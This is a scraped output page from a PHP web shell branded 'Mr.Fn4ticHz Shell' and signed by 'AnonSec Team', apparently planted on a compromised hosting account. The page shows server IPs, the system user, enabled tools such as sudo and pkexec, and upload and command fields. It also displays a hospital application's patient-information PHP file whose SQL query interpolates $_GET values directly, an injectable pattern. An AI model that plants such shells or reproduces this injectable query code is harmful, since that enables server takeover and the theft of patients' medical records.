Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.15.140.68
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//show_PatientInformation.php
<h3 align='center'>Patient Information</h3>
<table id='example2' class='table table-bordered table-hover'>
<?php
  	$sql ="SELECT * FROM PatientInformation WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
if($rs[Diagnosis] == 'on'){
    echo " <tr><td width='50%'>Diagnosis/ Nature of disease: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Diagnosis/ Nature of disease: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Investigation] == 'on'){
    echo " <tr><td width='50%'>Investigation / treatment that may need to undergo: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Investigation / treatment that may need to undergo: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Duration_hospital] == 'on'){
    echo " <tr><td width='50%'>Duration of hospital stay: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Duration of hospital stay: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Estimatedexpenses] == 'on'){
    echo " <tr><td width='50%'>Estimated expenses of Treatment: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Estimated expenses of Treatment: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Possible_outcome] == 'on'){
    echo " <tr><td width='50%'>Possible outcome of treatment: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Possible outcome of treatment: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Invited_patient] == 'on'){
    echo " <tr><td width='50%'>Invited patient to participate in the decisionmaking process: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Invited patient to participate in the decisionmaking process: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}

if($rs[Explained_importance] == 'on'){
    echo " <tr><td width='50%'>Explained the importance of patient’s role in the decisionmaking process: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Explained the importance of patient’s role in the decisionmaking process: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
if($rs[Discussed_essential] == 'on'){
    echo " <tr><td width='50%'>Discussed the essential issues about patient’s condition: </td>
<td width='50%'><i class='fa fa-check' aria-hidden='true'></i></td></tr>";
} else{
    echo "<tr><td width='50%'>Discussed the essential issues about patient’s condition: </td>
<td width='50%'><i class='fa fa-times' aria-hidden='true'></i></td></tr>";
}
}
?>

</table>

Anon7 - 2022
AnonSec Team